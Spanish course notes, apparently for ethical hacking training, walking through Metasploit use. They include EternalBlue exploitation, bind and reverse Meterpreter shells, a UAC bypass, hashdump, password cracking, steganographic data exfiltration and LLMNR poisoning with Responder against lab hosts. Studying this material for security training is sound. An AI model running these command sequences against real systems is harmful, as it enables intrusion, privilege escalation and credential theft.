1. Reconocimiento
2. Escaneo
2.1. Puertos y Servicios
2.2. Enumeracion
2.3. Analisis de Vulnerabilidades

3. Ganando Acceso
Tools: METASPLOIT, Core Impact, Canvas, Scripts o Exploit manuales (exploit-db.com)

*** METASPLOIT ****
4 maneras de acceder
A) Consola - msfconsole
b) GUI - ARMITAGE
c) WEB
d) API 

Módulos:
Auxiliar: ayuda
Exploit: contiene exploit
Payload: contiene payload (METERPRETER)
Post-Explotacion: PARA OBTENER MAS INFORMACION | ELEVAR PRIVILEGIOS 
Encoder: encoder (shikata_ganai)

*Opciones:

search 	[MODULO]
use		[MODULO]
set PAYLOAD		--> el payload solo acompaña al EXPLOIT 
show options
set RHOSTS
set [OPCIONES]
exploit / run

+ Modulo AUXILIAR: Modulo de ayuda, escanea puertos, vulnerabilidades, adminis. servicios, dos

use AUXILIARY/[SUB-MODULO]/[PROTOCOLO]/[ACCION_A_REALIZAR]
			   SCANNER --> escanear puertos, vulnerabilidades
			   ADMIN   --> administrar servicios 
			   DOS	   --> denegacion de servicio 

use auxiliary/scanner/smb/ms17_010_scanner 
show options			(concentrate REQUERIDAS)
set RHOSTS	IP_TARGET
exploit 

use auxiliary/scanner/rdp/ms12_020_detect 
use auxiliary/scanner/mssql/mssql_login 



Win7: 4.152			hacked | P@ssword 
Kali: 4.130

Kali:
root	TCP syn | ack | fin  


+ Modulo EXPLOIT:

use EXPLOIT/[PLAT./ARQ.]/[PROTOCOLO]/[EXPLOIT_ESPECIFICO]

use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/rdp/cveXXX_BLUEKEEP
use exploit/multi/http/tomcat_sadasdasd

+ PAYLOAD 

set PAYLOAD [PLAT./ARQ]/[NOMBRE_PAYLOAD]/[TIPO_DE_CONEXION]
						 METERPRETER	  BIND_TCP (directa)
						 SHELL			  REVERSE_TCP (reversa)
						 VNC_INJECT


set PAYLOAD windows/x64/meterpreter/bind_tcp 
SET PAYLOAD windows/x64/shell/reverse_tcp 


use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp

				CONEXION DIRECTA (BIND_TCP)
-----------								------------
										TCP/445 ETERNAL_BLUE
				exploit 
				--------->				445
							FIREWALL
				payload					3333
				--------->

-----------								-------------
Kali									      Win7 



				CONEXION reversa (reverse_TCP)
-----------								------------
										TCP/445 ETERNAL_BLUE
				exploit 
				--------->				445
							firewall
				payload		
		443		<---------
		HANDLER
		LISTENER
-----------								-------------
Kali									      Win7 

**Meterpreter**

getuid
getpid
sysinfo
pwd
ls
ps
download
upload
screenshot


hashdump
Obtener la SAM de Microsoft Windows

							 contraseña
USUARIO			: ID USER 	: LM HASH 			:  NTLM HASH 

Administrator	:  500	   	: aad3b435b51404ee 	:  wepwquewqe


HASH
Concepto:
algoritmo1(PASSWORD) = sdasldkhaslkhdlkashwe
algoritmo2(PASSWORD) = ewqureoiuweioruewruw1

LM --> 98,XP,2003
NTLM --> VISTA,2008,2012,7,10,2016,2019

LM tenia debilidades:
1. Parte la contraseña de 7 en 7
2. no diferenciaba entre MAYUS y MINUSC
3. Longitud max de 14 caracteres

Propiedades:
1. Es de facil generacion pero DIFICIL REVERSA
2. NO DEBEN COLISIONAR 
MD5 -> COLISIONADO
SHA(palabra1) = HASH1
SHA(palabra2) = HASH2
SHA(palabra3) = HASH1

CRACKING de contraseñas:

A) Cracking ONLINE
- cuando el servicio esta en funcionamiento
	* FUERZA BRUTA		--> 
	* DICCIONARIO		--> conjunto de palabras usadas


B) Cracking OFFLINE
- Procesar HASH para obtener el origen 
	* FUERZA BRUTA		--> Todas las posibles combinaciones
	* DICCIONARIO		--> conjunto de palabras usadas
	* MIX FUERZA BRUTA Y DICCIONARIO 
	* TABLAS PRE-COMPUTADAS (RAINBOW TABLES)
		PUEDE SER MUY GRANDE

NTLM(sistemas) = HASH1
NTLM(sistemas2) = HASH2
NTLM(sistemas3) = HASH3

BD DE HASHES
HASH0
HASH1
HASH2
HASH3


LM tables		-> xp tables
NTLM tables 	-> vista tables 	


1. Buscar el HASH en INTERNET 
2. Tablas PRE-COMPUTADAS
3. DICCIONARIO
4. CRACK ONLINE 

OPHCRACK
RCRACK - Rainbown Crack --> 
John The Rippher --> 
CAIN
LC5 
HASHCAT  --> 

ATAQUES DEL LADO DEL CLIENTE
(Client Side Attack)

Para crear payloads
msfvenom 

		ATAQUES DEL LADO DEL CLIENTE
				
--------					--------
								meterpreter.exe
								LHOST = IP_KALI
			<------
			payload reverso 
--------					---------
Kali						Windows

HANDLER
LISTERNER

Exploit REMOTO
Exploit LOCALES (muy utilizado para elevar privilegios)


meterpreter> getuid
ADMIN
meterpreter> background
session 1 en background

msfconsole> use post/multi/recon/local_exploit_suggester
msfconsole> set SESSION 1
msfconsole> exploit 

Listado de 04 exploits locales

msfconsole> use exploit/windows/local/bypassuac_eventvwr 
msfconsole> set SESSION 1
msfconsole> set payload windows/meterpreter/reverse_tcp
msfconsole> set LHOST 10.10.10.11
msfconsole> exploit

meterpreter> getsystem
meterpreter> run post/windows/gather/hashdump


















Enemigo Nro.1 de las TABLAS PRE-COMPUTADAS
SALT - una palabra aleatoria

SHA(12345678 + martin)  = HASH1
SHA(12345678 + omar)    = HASH2 


usuario1		12345678		HASH0 
usuario2		12345678		HASH0  

En Windows
ntlm(12345678)	HASH0 


/etc/passwd		--> Almacenan usuarios
/etc/shadow		--> Almacenan los hashes 

Esteganografia: es el proceso es esconder INFORMACION dentro de otra informacion
para que no los descubran y sacar informacion de una empresa 

JPG -> NOTEPAD.txt
PNG -> word.docx 
xls -> word 
PDF -> imagen

						HEXADECIMAL
---------------			----------			
hola mundo 				headers JPG		

							ZIP


						foot jpg 
---------------

Covert Channel:
Canal no oficial, no autorizado. Canal por atacantes para fuga de informacion.


LLMNR y NETBIOS (solo en red LAN) 
---------------

\\ceh-tools
1) Revisar el archivo HOST (C:\windows\system32\drivers\etc) 
2) Consulta al DNS
3) LLMNR (enviando por broadcast)
4) NETBIOS 

--------
			BROADCAST
intranet	--------->			
			\\ceh-tools\		Credenciales del usuario OMAR 
--------
usuario Omar 
Windows 

			Tool: RESPONDER 
			Esperando LLMNR 
			-------
			ATACANTE			
			-------
			Suplanta la identidad de INTRANET
			Recibe USUARIO y PASSWORD 

HASHCAT




